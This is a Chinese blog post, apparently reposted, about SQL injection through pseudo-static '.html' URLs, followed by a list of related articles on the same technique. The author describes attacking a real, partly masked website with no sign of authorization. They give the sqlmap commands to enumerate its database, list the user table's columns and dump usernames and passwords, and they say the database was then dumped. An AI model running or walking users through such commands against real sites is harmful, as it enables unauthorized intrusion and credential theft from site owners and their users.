伪静态注入

最新推荐文章于 2022-03-03 11:07:31 发布
最新推荐文章于 2022-03-03 11:07:31 发布
阅读量130 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 数据库 python
原文链接:https://yq.aliyun.com/articles/549115

今天在学习的过程中发现了一个网站的伪静态含有注入,便对此进行了渗透

wKioL1j6zfWzo1wYAABrN7eFsB0527.png-wh_50

利用工具:sqlmap

我在”/id/12.html“上的12后面加上*,然后放在sqlmap上爆

先查看当前的数据库,命令为sqlmap.py -u url --current-db,查看的数据库为下图

wKiom1j6zt7iwKQCAAAwlwJpw84378.png-wh_50

1:查看这个数据库里面的表,指定数据库命令为python sqlmap/sqlmap.py -u "http://www.***.com/en/?product/id/12*.html" -D ingenic_en --tables

wKiom1j6z5OxvyHuAAAPN8T91gM344.png-wh_50


2:找出表中含有的字段,命令为python sqlmap/sqlmap.py -u "http://www.***.com/en/?product/id/12*.html" -D ingenic_en -T mx_user --columns

wKiom1j60ECy71XEAAA9Nc4DEmA274.png-wh_50


3:爆这些字段的内容:name,password,username,命令为python sqlmap/sqlmap.py -u "http://www.***.com/en/?product/id/12*.html" -D ingenic_en -T mx_user -C name,password,username --dump

wKiom1j60WWD5SGBAABDIsgW_98897.png-wh_50


如上所示,爆出了字段的内容,获得了用户名和密码,密码是需要解密的,最后是拖库




本文转自 towardly 51CTO博客,原文链接:http://blog.51cto.com/brighttime/1918427
【漏洞挖掘】——25、XXE靶机实践测试
Fly_鹏程万里
03-08 8693
Haboob团队根据https://www.exploit-db.com/docs/45374发表的论文"XML外部实体注入-解释和利用"制作了这个虚拟机以利用私有网络中的漏洞,我们希望你喜欢这个挑战!
伪静态注入
afei001
06-25 2040
伪静态伪静态”顾名思义就是一种表面上看似是静态网页(以.html、.htm等结尾),不存在任何的数据交互,却其实是动态网页,存在数据交互的网站,具有这种特性的网页成为“伪静态网页”。我们看到的伪静态网页其实是经过处理的,将动态网页的id等参数通过URL重写来隐藏,让查看者以为是静态网页。 伪静态网站 如果看到一个以.html或者.htm结尾的网页,此时可以通过在地址输入框中输入:javascript:alert(document.lastMod...
sql注入之mysql数据库 sqlmap工具 伪静态注入 注入防御
weixin_46476861的博客
03-03 2957
python2和python3互不兼容,SqlMap是基于python2的,用2.7或之前的,所以SqlMap不支持python3 -u –level –risk -v 在包里参数进行测试语句 -m –mobile app通过抓包能得到url,但是不能在电脑地址栏里转到,所以需要模拟手机 -batch-smart 注入过程不需要在选择y或者n ctrl+c取消暴力破解 -r -p -threads 数据库外围命令
伪静态注入中转突破伪静态
07-24
伪静态注入中转突破伪静态】是一种网络安全技术,用于在动态网站中模拟静态页面,以提高搜索引擎优化和用户体验。然而,这种技术也带来了一定的安全隐患,因为伪静态URL结构使得传统SQL注入攻击手段变得更为复杂。...
伪静态注入中转
10-06
在IT安全领域,"伪静态注入中转"是一种常见的攻击手段,主要针对Web应用程序。这里的“伪静态”指的是将动态网页通过技术手段转化为看似静态的URL形式,以提高搜索引擎优化(SEO)和用户体验。然而,这种转换过程也...
在图片注入伪静态注入)习题情况下得到的知识集合
zezai3010的博客
12-13 2712
一、伪静态注入 (一)伪静态定义: 为了实时的显示一些信息。或者还想运用动态脚本解决一些问题。不能用静态的方式来展示网站内容。伪静态只是改变了URL的表现形式,实际上还是动态页面。 例:http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/ 和http://lab1.xseclab.com/sqli6_f37a4a60
PHP针对伪静态注入总结【附asp与Python相关代码】
12-18
本文实例讲述了PHP针对伪静态注入。分享给大家供大家参考,具体如下: 一:中转注入法 1.通过http://www.xxx.com/news.php?id=1做了伪静态之后就成这样了 http://www.xxx.com/news.php/id/1.html 2.测试步骤: ...
记录一次伪静态注入
weixin_34336292的博客
05-23 619
记录一次伪静态注入 0x01:前言 偶然得到一个站,顺便练习一下手注,记录一下过程 0x02:辨别伪静态 网站url结构: 是不是类似index.php?pid=2,感觉有猫腻的话就顺手试一下。 改变url为 发现未屏蔽报错,且暴露了部分信息 可以得出数据库为mysql,且网站框架为tp,基本可以确定是伪静态了,这就意味着/index/pid/2.html等同于...
伪静态的sql注入
p_utao的博客
09-17 3131
伪静态是什么 伪静态是相对真实静态来讲的,通常我们为了增强搜索引擎的友好面,都将文章内容生成静态页面,但是有的朋友为了实时的显示一些信息。或者还想运用动态脚本解决一些问题。不能用静态的方式来展示网站内容。但是这就损失了对搜索引擎的友好面。怎么样在两者之间找个中间方法呢,这就产生了伪静态技术。伪静态技术是指展示出来的是以html一类的静态页面形式,但其实是用ASP一类的动态脚本来处理的。 伪静态验证 既然,我们了解什么是伪静态后,那么我们怎么判断一个网站是静态还是伪静态的呢? 首先我们可以根据网站最后的修
SQL注入之——伪静态注入
weixin_41657031的博客
07-15 2531
1.什么是伪静态注入? 答:“伪静态”顾名思义就是一种表面上看似是静态网页(以.html、.htm等结尾),不存在任何的数据交互,却其实是动态网页,存在数据交互的网站,具有这种特性的网页成为“伪静态网页”。我们看到的伪静态网页其实是经过处理的,将动态网页的id等参数通过URL重写来隐藏,让查看者以为是静态网页。展示出来的是以html一类的静态页面形式,但其实是用PHP一类的动态脚本来处理的。 2....
伪静态注入技术
weixin_33805992的博客
01-05 221
文/似曾相识 常规伪静态页面如下:http://www.XXX.com/play/Diablo.html,在看到之前先要确定这个页面是静态还是伪静态,鉴别方法很多,也很简单这里就不说了。 例如关联的动态页面是game.php ,那么当用户访问后程序会自动转换成类似http://www.XXX.com/game.php?action=play&name=Diabl...
伪静态注入笔记
weixin_42751423的博客
05-07 409
常规注入一样,比如用注入第一个url /id/1131.html 直接在1131后面加个 ’ 或者 -0 看看报错不 常见伪静态: aspcms phpweb thinkphp框架 在sqlmap跑的时候注意,把链接输进去之后会显示没有注入点 只需要在 /id/1131.html 1131后面加个 * 就行 ...
伪静态注入方法讲解
weixin_30449239的博客
02-10 338
伪静态,主要是为了隐藏传递的参数名,伪静态只是一种URL重写的手段,既然能接受参数输入,所以并不能防止注入。目前来看,防止注入的最有效的方法就是使用LINQ。常规伪静态页面如下:http://www.XXX.com/play/Diablo.html, 在看到之前先要确定这个页面是静态还是伪静态,鉴别方法很多。 例如关联的动态页面是game.php ,那么当用户访问后程序会自动转换成类似htt...
伪静态注入的总结
weixin_30257433的博客
10-09 248
一:中转注入法 1.通过http://www.xxx.com/news.php?id=1做了伪静态之后就成这样了 http://www.xxx.com/news.php/id/1.html 2.测试步骤: 中转注入的php代码:inject.php <?php set_time_limit(0); $id=$_GET["id"]; $id=str_replace(”...
伪静态sql注入sqlmap
最新发布
09-20
伪静态SQL注入是指在伪静态页面中通过注入恶意的SQL语句来获取或修改数据库中的信息。与真实的静态页面不同,伪静态页面是通过服务器脚本将动态内容转化为静态的HTML页面。在注入防御方面,PDO(PHP Data Object)...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值